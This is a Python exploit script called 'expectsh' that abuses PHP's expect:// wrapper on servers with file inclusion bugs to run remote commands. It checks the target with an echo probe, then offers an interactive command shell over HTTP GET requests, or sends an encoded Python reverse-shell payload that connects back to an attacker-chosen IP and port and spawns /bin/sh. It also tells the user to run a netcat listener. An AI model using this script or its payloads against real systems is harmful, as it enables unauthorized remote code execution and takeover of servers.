#!/usr/bin/python
# expectsh v0.2
# Uses PHP's expect:// filter for RCE
# For abusing File Inclusion Bugs.
# Author: Darren 'infodox' Martyn
# Site: insecurety.net
# Twatter: @info_dox
import sys
import requests

def banner():
    print """
                    'I EXPECT A SHELL!
          expectsh v0.3 - Insecurety Research
Abuses PHP's expect:// wrapper to execute remote code on servers which are
1. Vulnerable to File Inclusion
2. Have Expect installed.
Reliable enough...
 ~ infodox
Explaination of how it all works: http://insecurety.net/?p=724
"""

if len(sys.argv) != 2:
    banner()
    print "Usage: ./expectshell.py <target url>"
    print "Example: ./expectshell.py http://localhost/include.php?hax="
    sys.exit(1)

targeturl = sys.argv[1]
expectme = """expect://"""

def expectchk(targeturl, expectme):
    print "[*] Testing is box vulnerable to this trick..."
    cmd = "echo w00tw00t"
    hax = targeturl + expectme + cmd
    r = requests.get(hax)
    if "w00tw00t" in r.text:
        print "[+] Vulnerable!"
        pass
    else:
        print "[-] Not Vulnerable, Quitting..."
        sys.exit(0)

def expectsh(targeturl, expectme):
    print "[+] Spawning a shell"
    while True:
        try:
            cmd = raw_input("expectsh:~$ ")
            expectme = """expect://"""
            hax = targeturl + expectme + cmd
            r = requests.get(hax)
            print r.text
        except KeyboardInterrupt:
            print "\n[-] Quitting!"
            sys.exit(1)

def reversesh(targeturl, expectme):
    print "[+] Using a Python Reverse Shell"
    print "[*] You must setup a netcat on the listener!"
    print "[*] nc -lvp $portoflistener ok?"
    reverseip = raw_input("IP to phone home to: ")
    reverseport = raw_input("Port of Listener: ")
    payloadstage1 = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22"""
    payloadstage2 = """%22,"""
    payloadstage3 = """));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""
    payload = payloadstage1 + reverseip + payloadstage2 + reverseport + payloadstage3
    hax = targeturl + expectme + payload
    print "[+] Sending Reverse Shell... This will hang while your shell is running!"
    requests.get(hax)
    print "[:>] Hope you enjoyed!"
    print "[-] Exit..."
    sys.exit(0)
    
def main(targeturl, expectme):
    banner()
    print "[+] Attacking " + targeturl
    vuln = expectchk(targeturl, expectme)
    print "[!] So, what will we do now? (Choose an option)"
    print "1. Spawn an Inline Shell"
    print "2. Spawn a Reverse Shell"
    what = raw_input("Select: ")
    if what == "1":
        expectsh(targeturl, expectme)
    elif what == "2":
        reversesh(targeturl, expectme)
    else:
        print "[-] Invalid Selection, exit!"
        sys.exit(0)

main(targeturl, expectme)
